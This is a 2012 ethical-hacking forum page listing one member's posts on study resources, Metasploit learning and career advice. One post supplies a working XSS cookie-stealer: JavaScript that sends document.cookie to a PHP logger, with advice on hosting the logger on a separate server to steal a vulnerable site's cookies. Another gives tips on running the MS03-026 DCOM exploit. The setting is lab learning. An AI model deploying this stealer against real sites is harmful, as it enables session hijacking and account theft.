Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.






Lost Password?
No account yet? Register
Who's Online
We have 42 guests and 2 members online
 
Advertisement

You are here: Home
EH-Net
May 22, 2013, 04:09:44 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
  Home Help Calendar Login Register  
  Show Posts
Pages: [1] 2 3
1  Ethical Hacking Discussions and Related Certifications / Programming / Re: Some questions as usual on: September 25, 2012, 07:53:37 AM
Another great resource to get started with exploit, assembler & co is opensecuritytraining http://opensecuritytraining.info/Training.html

I found them a couple of days ago and already did their Intro x86 class, which I really liked a lot.

Haven't seen them mentioned anywhere here on EHN yet, so I thought I share the link for anybody who wants to get started with assembly, exploits, rootkits and other fun stuff.

Their youtube channel is located here: http://www.youtube.com/user/OpenSecurityTraining/videos?flow=grid&view=1

Happy hacking!
2  Resources / Tutorials / Re: ms03_026_dcom help please on: May 28, 2012, 06:48:00 AM
+1 to what unicityd wrote.

@ZeroOne I agree with you on that. But as unicityd wrote ... it's not the point to have a working exploit with which you can hack a gazillion of machines, but to learn how Metasploit as a tool functions. And here I think for learning purposes it's totally fine to follow along an "old" exploit just to see what options there are, how to use them ...and so on... So, see it as a "walk before you can run" thing ;o).

One thought on "who on earth will be using XP with no SPs", though. Think about all the people who run a stolen/hacked copy of XP (or Vista or Win7) on their machines with update services disabled in panic of not getting caught ... I heared this can be quite common in Third World countries. I don't know any statistics to show this though... it was just a thought...so please don't get me on this ;o)...

But you are probably right, in times of vista, win7 an unpatched copy of XP might be rare... (at least I have no personal experience about that...)

@ cyber.spirit
I think the patch was originally after SP1(or2) and then later added to the SPs... that's why we still see Win 2003 in target range in Metasploit (was that your question?!?)...not sure about this though...

I really like the videos on securitytube. I am quite a fan of the "visual learning approach"....since I can better remember things when someone has shown me how to do it.

Anyways, have fun with the video series!


3  Resources / Tutorials / Re: ms03_026_dcom help please on: May 27, 2012, 01:07:42 PM
Hi cyber.spirit

I guess you go through Viveks Videos on Metasploit, right?!

As far as I know the RPC-dcom exploit has been patched in SP1 or 2 ...not 100% sure at the moment.

However, the exploit will definately work with an unpatched Win XP - so no SPs (I tested that). Also make sure to disable any (Windows-) firewall.



4  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: php script is not getting session cookie... on: April 14, 2012, 03:51:39 AM
Hi wlandymore,

ok this might sound odd - and it's just a thought ...so don't get me wrong, but do you start your html file in a "server-context" meaning is it in your htdocs or do you just open it on your harddrive?

Since if you do the second it won't work or at least you cannot read the cookies from localhost ...(Happend to me too...an alertbox on the page worked however php script could't read cookies...).

For "debuggin" try to throw both scripts in your htdocs ... and look if the php script gets the cookies...

Don't know if this helps, was just a thought....

Cheers,
-gromic

5  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: need a little help with a cookie grab script... on: April 08, 2012, 06:41:27 AM
Hi wlandymore, hi ajohnson

The following code (cookie_site.html and cookiestealer.php  ) should work (Seems that you just missed a / before your stealer script redirect in your html page).

I tested it via a xampp setup and it worked.

Just throw both of the files into your XAMPP htdocs.

file: cookie_site.html
Code:
<html>
    <head>
    <script type="text/javascript"> document.cookie = "Test123";</script>
    </head>
  <body>
    This page is a test
    <script> alert(document.cookie)</script>
    <script> document.location = "/cookiestealer.php?cookie=" + document.cookie; </script>
  </body>
</html>

file: cookiestealer.php
Code:
<?php
  $cookie 
$_GET['cookie'];
  
$log fopen("cookielog.txt""a");
  
fwrite($log$cookie ."\n");
  
fclose($log);
?>


Note:
  • So far, page and stealer.php run on the same server (I know...not intended). When you move your stealer.php to another server you have to adjust your path i.e. “http://<Server IP >/cookiestealer.php?cookie=” … and so on..
  • One more tip: When debugging your scripts make sure you delete your browsers cache each time... very often I changed something but my browser (Chrome) showed me still the old results  Grin
  • cross domain issues should't be a problem since as far as I understood the idea was to place the "stealer script" on a site which is vuln to XSS and steal the cookies related to THIS site, right? If you want to read cookies of another domain you run into "same orgin" issues..
Hope this helps and works for you.
6  Resources / Career Central / Re: What now ?? on: March 05, 2012, 11:16:40 AM
Hi Jamie,
 
I am really sorry to hear that with your job. I second what everybody has written so far.
From your posts here on EH-net as well as your site you seem really passionate about ITsec…So DON’T give up!

Quote
"Our greatest glory is not in never failing, but in rising up every time we fail.”
(Ralph Waldo Emerson)

Since I am still in my masters and job hunting for me won’t start before august, this is the only “real advice” I can give you: “DON’T give up, if IT-Sec is really your passion!!”

If I were in your situation, though, I would first ask your employer for a talk to elaborate on the exact reasons why they have fired you. This might hurt, but will give you valuable information on what you can improve the next time.

Second I would right away start to apply for new pentesting jobs. Don’t let the “feeling of being not good enough” let you down or discourage you and get right into the game again!
And only if this won’t work out for whatever reasons “too less job experience”, “too young”….blah blah… try to get a job as admin or what else…to build a solid foundation (always with the goal to learn something new...so no "brain death" jobs). 
And never forget to focus on your goal or “dream job”!

I wish you good luck and all the best!! And again: Don’t give up!
7  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Material for SecurityTube Metasploit Framework Expert (SMFE) available on: February 29, 2012, 10:53:55 AM
You can still donate $20 or something to help cover bandwidth, hosting, etc. I did this the other for the assembly and beginner exploitation videos.

I did that today, too. I really appreciate the contents and already learned tons out of it.

I think it's a good thing to support, even though it's free  (as in
freedom not freebeer  Wink ), just to show the appreciation for the effort!

8  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Material for SecurityTube Metasploit Framework Expert (SMFE) available on: February 29, 2012, 09:50:59 AM
Hi guys,

Just found out today, that the materials for the SMFE at security tube is online.
It is not packaged in a DVD but you can download it here:
http://www.securitytube.net/groups?operation=view&groupId=10

Thx a lot Vivek for this great work!

It's just amazing how much effort he puts into these videos.

I watched the Megaprimer Metasploit (the SMFE ones are slightly different from first glance) and they are just great for getting into Metasploit.

I definitely will think of getting the SMFE in the near future but my budget is too low at the moment, since I just entered elearnsecurity.

Greetings
-gromic
9  Ethical Hacking Discussions and Related Certifications / Programming / Re: Open source security projects to participate in? on: February 02, 2012, 07:16:59 AM
You might also find w3af interesting:
http://w3af.sourceforge.net/

It is also coded in Python.
10  Resources / Tutorials / Re: Securitytube Metasploit videos on: January 31, 2012, 05:49:42 PM
Awesome! Can't wait for the DVD!

thx for the update lorddicranius
11  EH-Net / Greetings / Re: Hi, I'm New Here on: January 23, 2012, 01:10:10 PM
Welcome blue_hat,

With programming languages it is always a matter of "the right tool for the right job".  So as cd1zz mentioned it always depends on your goals.

Nevertheless I think it is always good to have various programming languages on your "tool belt" since very often they help looking at problems in different ways. Because when holding only the same hammer in your hand ...every problem somehow always looks like a nail... (and maybe not like a screw...) 

Again Welcome to EH-Net!
12  EH-Net / Greetings / Re: Good day ... on: January 23, 2012, 12:48:47 PM
Hi CeemGee and Welcome on EH-Network! Looking forward to read more from you in the future
13  Features / Opinions / Re: My website comments, feedback and more on: January 23, 2012, 12:45:24 PM
Hi Jamie,

Love your new design!! (have also been a visitor of your site when it had the old one)

Wow, I am jealous , since setting up a page/blog is also on my toDo list for quite some time now (the domain is already set)... and your site is just what I had imagined  Grin.

Maybe a bit off topic but I found out that you have removed the Syngress XSS Attack book from your "future" reading list ( If I can remember it right). 
Any reasons for this? Since I bought it the other week and think it is quite an interesting read (read the first 100 pages so far). 
Reading it always makes me shiver of what's all possible with Xss...
Anyways...getting back to the topic...

Great page!  Good luck with it!
14  Resources / Tutorials / Re: Securitytube Metasploit videos on: January 12, 2012, 04:07:09 PM
The Wifi-Sec iso file is 4,23 GB big ^^ Don't know if they sell/ship it.
15  Ethical Hacking Discussions and Related Certifications / Compliance, Regulations & Standards / Re: Hacking friends network on: January 12, 2012, 12:33:55 PM
A site for a great overview of diffrent vulnerable systems/apps for a pentest lab is:
http://g0tmi1k.blogspot.com/2011/03/vulnerable-by-design.html

Pages: [1] 2 3
Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com
Valid XHTML 1.0! Valid CSS!
Page created in 0.108 seconds with 21 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Advertisement

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.